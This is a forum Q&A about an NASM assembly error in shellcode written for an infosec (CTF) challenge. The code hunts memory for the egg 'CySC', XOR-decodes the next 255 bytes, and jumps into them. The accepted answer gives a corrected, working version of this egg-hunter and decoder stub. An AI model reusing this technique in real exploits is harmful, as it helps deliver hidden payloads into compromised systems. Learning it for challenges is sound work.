# Assembly "error: invalid effective address"

Tags: assembly, x86, shellcode

I'm writing shellcode to solve a infosec challenge that requires to first find an egg in memory "CySC", then xor the proceeding 255 bytes after the memory address of the egg tag, using the last byte of the memory address of the egg tag.  This is what I have come up with so far, but I'm getting the above error for line 19 which is the 'xor [eax+bl],cl' instruction.

```
BITS 32

start:
        mov eax, 0xb7469FFF ;this is one byte before the start of where the code "CySC" can be found
        mov ebx, 'CySC'     ;obvious.

compare:
        inc eax             ;move to the next byte, which is the start of the range where "CySC" can be found
        cmp [eax], ebx      ;does the data located at eax equal "CySC" ?
        jne compare         ;Loop if not, increment eax by one and check next mem add

foundit:
        xor ecx, ecx        ;zero out ecx to store the last byte of eax's mem address where "CySC" is located.  Remember this is what we will xor the rest of the shellcode with.
        mov cl, al          ;move the last byte of eax into cl
        xor ebx, ebx        ;zero out ebx for use as a counter in the next loop


deobfuscate:
        dec bl              ;subtract 1 from bl, the first loop will be 255 (ff)
        xor [eax+bl],cl     ;look at what is located at eax+bl (eax+255 first loop)
        cmp [bl], 4         ;is bl counter equal to 4?
        jne deobfuscate     ;if it is continue, if not loop

runshellcode:
        add eax, 4          ;add 4 to x as this is our egg tag "CySC"
        call eax            ;execute shellcode at eax
```

Any suggestions would be much appreciated!

Comment: You can't use byte-sized registers as memory pointers.

Comment: As well as being invalid as an address component, `bl` seems to be constant in `deobfuscate`? What exactly are you trying to do there?

Comment: I'm setting bl to ff or 255, then decrementing by 1 each loop until it reaches zero, because I need to xor 255 bytes after eax.

Comment: But you zero it in the loop!

Comment: I commented my code to show you what I intended to happen, hopefully this helps.

Comment: OK. After your edit the `xor` has moved out of the loop, obviating my question.

Answer (score 0, accepted):

The problem was in "xor [eax+bl],al", because the [] brackets denote that everything within will be a pointer to the value located at the memory address... so bl = 0xFF in the first loop, obviously an invalid mem address.  So I just changed it to "xor [eax+ebx],al" to pull the value located at ebx, and it worked.  Got my flag!  Thanks for the help.

```
BITS 32

start:

      mov eax, 0xb7469FFF
      mov ebx, 'CySC'
compare:

      inc eax
      cmp [eax], ebx
      jne compare

foundit:
      xor ecx, ecx
      mov cl, al
      xor ebx, ebx

deobfuscate:
      dec bl
      xor [eax+ebx],al
      cmp bl, 0x4
      jne deobfuscate

execute:
      add eax, 4
      call eax
```